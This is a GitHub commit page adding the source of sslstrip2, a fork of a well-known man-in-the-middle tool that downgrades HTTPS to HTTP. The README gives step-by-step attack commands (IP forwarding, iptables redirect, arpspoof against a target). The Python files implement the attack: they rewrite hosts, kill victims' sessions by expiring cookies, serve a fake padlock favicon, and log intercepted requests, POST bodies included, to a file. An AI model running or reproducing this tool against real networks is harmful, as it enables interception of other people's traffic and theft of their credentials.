forked from LeonardoNve/sslstrip2
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
0 parents
commit 8b57759
Showing
47 changed files
with
3,507 additions
and
0 deletions.
There are no files selected for viewing
Large diffs are not rendered by default.
Oops, something went wrong.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,32 @@ | ||
sslstrip is a MITM tool that implements Moxie Marlinspike's SSL stripping | ||
attacks. | ||
|
||
It requires Python 2.5 or newer, along with the 'twisted' python module. | ||
|
||
Installing: | ||
* Unpack: tar zxvf sslstrip-0.5.tar.gz | ||
* Install twisted: sudo apt-get install python-twisted-web | ||
* (Optionally) run 'python setup.py install' as root to install, | ||
or you can just run it out of the directory. | ||
|
||
Running: | ||
sslstrip can be run from the source base without installation. | ||
Just run 'python sslstrip.py -h' as a non-root user to get the | ||
command-line options. | ||
|
||
The four steps to getting this working (assuming you're running Linux) | ||
are: | ||
|
||
1) Flip your machine into forwarding mode (as root): | ||
echo "1" > /proc/sys/net/ipv4/ip_forward | ||
|
||
2) Setup iptables to intercept HTTP requests (as root): | ||
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <yourListenPort> | ||
|
||
3) Run sslstrip with the command-line options you'd like (see above). | ||
|
||
4) Run arpspoof to redirect traffic to your machine (as root): | ||
arpspoof -i <yourNetworkDevice> -t <yourTarget> <theRoutersIpAddress>
|
||
More Info: | ||
http://www.thoughtcrime.org/software/sslstrip/ |
Empty file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,203 @@ | ||
# Copyright (c) 2004-2009 Moxie Marlinspike | ||
# | ||
# This program is free software; you can redistribute it and/or | ||
# modify it under the terms of the GNU General Public License as | ||
# published by the Free Software Foundation; either version 3 of the | ||
# License, or (at your option) any later version. | ||
# | ||
# This program is distributed in the hope that it will be useful, but | ||
# WITHOUT ANY WARRANTY; without even the implied warranty of | ||
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU | ||
# General Public License for more details. | ||
# | ||
# You should have received a copy of the GNU General Public License | ||
# along with this program; if not, write to the Free Software | ||
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 | ||
# USA | ||
# | ||
|
||
import urlparse, logging, os, sys, random, re | ||
|
||
from twisted.web.http import Request | ||
from twisted.web.http import HTTPChannel | ||
from twisted.web.http import HTTPClient | ||
|
||
from twisted.internet import ssl | ||
from twisted.internet import defer | ||
from twisted.internet import reactor | ||
from twisted.internet.protocol import ClientFactory | ||
|
||
from ServerConnectionFactory import ServerConnectionFactory | ||
from ServerConnection import ServerConnection | ||
from SSLServerConnection import SSLServerConnection | ||
from URLMonitor import URLMonitor | ||
from CookieCleaner import CookieCleaner | ||
from DnsCache import DnsCache | ||
|
||
class ClientRequest(Request):

    ''' This class represents incoming client requests and is essentially where
    the magic begins.  Here we remove the client headers we dont like, and then
    respond with either favicon spoofing, session denial, or proxy through HTTP
    or SSL to the server.
    '''

    def __init__(self, channel, queued, reactor=reactor):
        Request.__init__(self, channel, queued)
        self.reactor = reactor
        # Process-wide singletons shared by every request.
        self.urlMonitor = URLMonitor.getInstance()
        self.cookieCleaner = CookieCleaner.getInstance()
        self.dnsCache = DnsCache.getInstance()
        # self.uniqueId = random.randint(0, 10000)

    def cleanHeaders(self):
        # Build a doctored copy of the client's headers suitable for
        # forwarding to the real server.
        headers = self.getAllHeaders().copy()

        # Refuse compressed responses so bodies can be inspected/rewritten.
        if 'accept-encoding' in headers:
            del headers['accept-encoding']

        if 'referer' in headers:
            real = self.urlMonitor.real
            if len(real)>0:
                # Map any stripped hostname appearing in the Referer back to
                # its original value via the URLMonitor's replacement table.
                dregex = re.compile("(%s)" % "|".join(map(re.escape, real.keys())))
                headers['referer'] = dregex.sub(lambda x: str(real[x.string[x.start() :x.end()]]), headers['referer'])

        # Strip cache validators so the server always returns a full body.
        if 'if-modified-since' in headers:
            del headers['if-modified-since']

        if 'cache-control' in headers:
            del headers['cache-control']

        if 'if-none-match' in headers:
            del headers['if-none-match']

        if 'host' in headers:
            # Translate the (possibly rewritten) Host header back to the real
            # upstream hostname, and tag the request with an internal
            # 'securelink' marker consumed later in handleHostResolvedSuccess.
            host = self.urlMonitor.URLgetRealHost("%s"%headers['host'])
            logging.debug("Modifing HOST header: %s -> %s"%(headers['host'],host))
            headers['host'] = host
            headers['securelink'] = '1'
            self.setHeader('Host',host)

        return headers

    def getPathFromUri(self):
        # Reduce an absolute-form URI ("http://host/path") to its path part.
        if (self.uri.find("http://") == 0):
            index = self.uri.find('/', 7)
            return self.uri[index:]

        return self.uri

    def getPathToLockIcon(self):
        # Locate lock.ico in the CWD or the installed share directory;
        # fall back to the bare name (with a warning) when neither exists.
        if os.path.exists("lock.ico"): return "lock.ico"

        scriptPath = os.path.abspath(os.path.dirname(sys.argv[0]))
        scriptPath = os.path.join(scriptPath, "../share/sslstrip/lock.ico")

        if os.path.exists(scriptPath): return scriptPath

        logging.warning("Error: Could not find lock.ico")
        return "lock.ico"

    def save_req(self,lfile,str):
        # Append a raw request dump to the given log file.
        # NOTE(review): parameter 'str' shadows the builtin; rename when convenient.
        f = open(lfile,"a")
        f.write(str)
        f.close()

    def handleHostResolvedSuccess(self, address):
        # Callback fired once the upstream host resolves: rewrite the request
        # (headers, path, POST body) and forward it via plain HTTP or SSL.
        headers = self.cleanHeaders()
        # for header in headers:
        #     logging.debug("HEADER %s = %s",header,headers[header])
        logging.debug("Resolved host successfully: %s -> %s" % (self.getHeader('host').lower(), address))
        lhost = self.getHeader("host").lower()
        host = self.urlMonitor.URLgetRealHost("%s"%lhost)
        client = self.getClientIP()
        path = self.getPathFromUri()
        self.content.seek(0,0)
        postData = self.content.read()
        real = self.urlMonitor.real
        patchDict = self.urlMonitor.patchDict

        # Undo the hostname rewriting in both the path and the POST body
        # before the request goes upstream; patchDict applies extra
        # body-only substitutions.
        if len(real)>0:
            dregex = re.compile("(%s)" % "|".join(map(re.escape, real.keys())))
            path = dregex.sub(lambda x: str(real[x.string[x.start() :x.end()]]), path)
            postData = dregex.sub(lambda x: str(real[x.string[x.start() :x.end()]]), postData)
        if len(patchDict)>0:
            dregex = re.compile("(%s)" % "|".join(map(re.escape, patchDict.keys())))
            postData = dregex.sub(lambda x: str(patchDict[x.string[x.start() :x.end()]]), postData)

        url = 'http://' + host + path
        # The body may have changed size after the substitutions above.
        headers['content-length']="%d"%len(postData)

        self.dnsCache.cacheResolution(host, address)
        if (not self.cookieCleaner.isClean(self.method, client, host, headers)):
            # First contact from this client/domain pair: expire its cookies.
            logging.debug("Sending expired cookies...")
            self.sendExpiredCookies(host, path, self.cookieCleaner.getExpireHeaders(self.method, client,
                                                                                   host, headers, path))
        elif (self.urlMonitor.isSecureFavicon(client, path)):
            logging.debug("Sending spoofed favicon response...")
            self.sendSpoofedFaviconResponse()
        elif (self.urlMonitor.isSecureLink(client, url) or ('securelink' in headers)):
            # Originally an HTTPS URL: proxy upstream over SSL, but do not
            # leak the internal 'securelink' marker to the server.
            if 'securelink' in headers:
                del headers['securelink']
            logging.debug("LEO Sending request via SSL...(%s %s)"%(client,url))
            self.proxyViaSSL(address, self.method, path, postData, headers,
                             self.urlMonitor.getSecurePort(client, url))
        else:
            logging.debug("LEO Sending request via HTTP...")
            self.proxyViaHTTP(address, self.method, path, postData, headers)

    def handleHostResolvedError(self, error):
        # Errback for a failed DNS resolution: log and close the request.
        logging.warning("Host resolution error: " + str(error))
        self.finish()

    def resolveHost(self, host):
        # Resolve via the local DNS cache first, falling back to the
        # reactor's asynchronous resolver; always returns a Deferred.
        address = self.dnsCache.getCachedAddress(host)

        if address != None:
            logging.debug("Host cached.")
            return defer.succeed(address)
        else:
            logging.debug("Host not cached.")
            return reactor.resolve(host)

    def process(self):
        # Twisted entry point: fired when a complete request has arrived.
        host = self.urlMonitor.URLgetRealHost("%s"%self.getHeader('host'))
        logging.debug("Resolving host: %s" % host)
        deferred = self.resolveHost(host)

        deferred.addCallback(self.handleHostResolvedSuccess)
        deferred.addErrback(self.handleHostResolvedError)

    def proxyViaHTTP(self, host, method, path, postData, headers):
        # Forward the rewritten request to the server over plain HTTP (port 80).
        connectionFactory = ServerConnectionFactory(method, path, postData, headers, self)
        self.save_req("debug_ssl.log",method+' http://'+host+path+'\n'+str(headers)+'\n'+postData+'\n')
        connectionFactory.protocol = ServerConnection
        self.reactor.connectTCP(host, 80, connectionFactory)

    def proxyViaSSL(self, host, method, path, postData, headers, port):
        # Forward the rewritten request to the server over SSL on the given port.
        self.save_req("debug_ssl.log",method+' https://'+host+path+'\n'+str(headers)+'\n'+postData+'\n')
        clientContextFactory = ssl.ClientContextFactory()
        connectionFactory = ServerConnectionFactory(method, path, postData, headers, self)
        connectionFactory.protocol = SSLServerConnection
        self.reactor.connectSSL(host, port, connectionFactory, clientContextFactory)

    def sendExpiredCookies(self, host, path, expireHeaders):
        # Redirect the client back to the same URL while expiring every
        # cookie it presented (session denial).
        self.setResponseCode(302, "Moved")
        self.setHeader("Connection", "close")
        self.setHeader("Location", "http://" + host + path)

        for header in expireHeaders:
            self.setHeader("Set-Cookie", header)

        self.finish()

    def sendSpoofedFaviconResponse(self):
        # Serve a padlock icon as the favicon to fake a "secure" visual cue.
        icoFile = open(self.getPathToLockIcon())

        self.setResponseCode(200, "OK")
        self.setHeader("Content-type", "image/x-icon")
        self.write(icoFile.read())

        icoFile.close()
        self.finish()
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,106 @@ | ||
# Copyright (c) 2004-2011 Moxie Marlinspike | ||
# | ||
# This program is free software; you can redistribute it and/or | ||
# modify it under the terms of the GNU General Public License as | ||
# published by the Free Software Foundation; either version 3 of the | ||
# License, or (at your option) any later version. | ||
# | ||
# This program is distributed in the hope that it will be useful, but | ||
# WITHOUT ANY WARRANTY; without even the implied warranty of | ||
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU | ||
# General Public License for more details. | ||
# | ||
# You should have received a copy of the GNU General Public License | ||
# along with this program; if not, write to the Free Software | ||
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 | ||
# USA | ||
# | ||
|
||
import logging | ||
import string | ||
|
||
class CookieCleaner:
    '''This class cleans cookies we haven't seen before.  The basic idea is to
    kill sessions, which isn't entirely straight-forward.  Since we want this to
    be generalized, there's no way for us to know exactly what cookie we're trying
    to kill, which also means we don't know what domain or path it has been set for.

    The rule with cookies is that specific overrides general.  So cookies that are
    set for mail.foo.com override cookies with the same name that are set for .foo.com,
    just as cookies that are set for foo.com/mail override cookies with the same name
    that are set for foo.com/

    The best we can do is guess, so we just try to cover our bases by expiring cookies
    in a few different ways.  The most obvious thing to do is look for individual cookies
    and nail the ones we haven't seen coming from the server, but the problem is that
    cookies are often set by Javascript instead of a Set-Cookie header, and if we block
    those the site will think cookies are disabled in the browser.  So we do the
    expirations and whitelisting based on (client, server) tuples.  The first time a
    client hits a server, we kill whatever cookies we see then.  After that, we just
    let them through.  Not perfect, but pretty effective.
    '''

    # Process-wide singleton instance.
    _instance = None

    def getInstance():
        """Return the shared CookieCleaner, creating it on first use."""
        if CookieCleaner._instance is None:
            CookieCleaner._instance = CookieCleaner()

        return CookieCleaner._instance

    getInstance = staticmethod(getInstance)

    def __init__(self):
        # (client, domain) pairs whose cookies have already been expired once.
        self.cleanedCookies = set()
        # Cookie killing is off unless explicitly enabled.
        self.enabled = False

    def setEnabled(self, enabled):
        """Turn cookie expiration on or off."""
        self.enabled = enabled

    def isClean(self, method, client, host, headers):
        """Return True when this request needs no cookie expiration.

        POSTs are always passed through (expiring them would break form
        submissions), as are requests when cleaning is disabled, requests
        carrying no cookies, and clients already seen for this domain.
        """
        if method == "POST":
            return True
        if not self.enabled:
            return True
        if not self.hasCookies(headers):
            return True

        return (client, self.getDomainFor(host)) in self.cleanedCookies

    def getExpireHeaders(self, method, client, host, headers, path):
        """Build Set-Cookie header values expiring every cookie in the request.

        Also whitelists (client, domain) so subsequent requests pass isClean().
        """
        domain = self.getDomainFor(host)
        self.cleanedCookies.add((client, domain))

        expireHeaders = []

        for cookie in headers['cookie'].split(";"):
            # Keep only the cookie name; values are irrelevant for expiry.
            cookieName = cookie.split("=")[0].strip()
            expireHeaders.extend(self.getExpireCookieStringFor(cookieName, host, domain, path))

        return expireHeaders

    def hasCookies(self, headers):
        """Return True when the request carries a Cookie header."""
        return 'cookie' in headers

    def getDomainFor(self, host):
        """Return the guessed parent domain ('.foo.com') for *host*.

        Single-label hosts (e.g. 'localhost') have no parent domain to
        guess, so the host itself is returned instead of raising IndexError.
        """
        hostParts = host.split(".")
        if len(hostParts) < 2:
            return host
        return "." + hostParts[-2] + "." + hostParts[-1]

    def getExpireCookieStringFor(self, cookie, host, domain, path):
        """Return expiry strings for *cookie* covering the likely domain/path combos.

        We can't know which scope the cookie was set for, so expire it for
        both the parent domain and the exact host, at '/' and (when the
        request path has one) the first path segment.
        """
        pathList = path.split("/")
        expireStrings = list()

        expireStrings.append(cookie + "=" + "EXPIRED;Path=/;Domain=" + domain +
                             ";Expires=Mon, 01-Jan-1990 00:00:00 GMT\r\n")

        expireStrings.append(cookie + "=" + "EXPIRED;Path=/;Domain=" + host +
                             ";Expires=Mon, 01-Jan-1990 00:00:00 GMT\r\n")

        if len(pathList) > 2:
            expireStrings.append(cookie + "=" + "EXPIRED;Path=/" + pathList[1] + ";Domain=" +
                                 domain + ";Expires=Mon, 01-Jan-1990 00:00:00 GMT\r\n")

            expireStrings.append(cookie + "=" + "EXPIRED;Path=/" + pathList[1] + ";Domain=" +
                                 host + ";Expires=Mon, 01-Jan-1990 00:00:00 GMT\r\n")

        return expireStrings
|
||
|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,28 @@ | ||
|
||
class DnsCache:

    '''
    The DnsCache maintains a cache of DNS lookups, mirroring the browser experience.
    '''

    # Process-wide singleton instance.
    _instance = None

    def __init__(self):
        # host -> resolved address
        self.cache = {}

    def cacheResolution(self, host, address):
        """Remember that *host* resolved to *address*."""
        self.cache[host] = address

    def getCachedAddress(self, host):
        """Return the cached address for *host*, or None when not cached."""
        return self.cache.get(host)

    def getInstance():
        """Return the shared DnsCache, creating it on first use."""
        if DnsCache._instance is None:
            DnsCache._instance = DnsCache()

        return DnsCache._instance

    getInstance = staticmethod(getInstance)
Oops, something went wrong.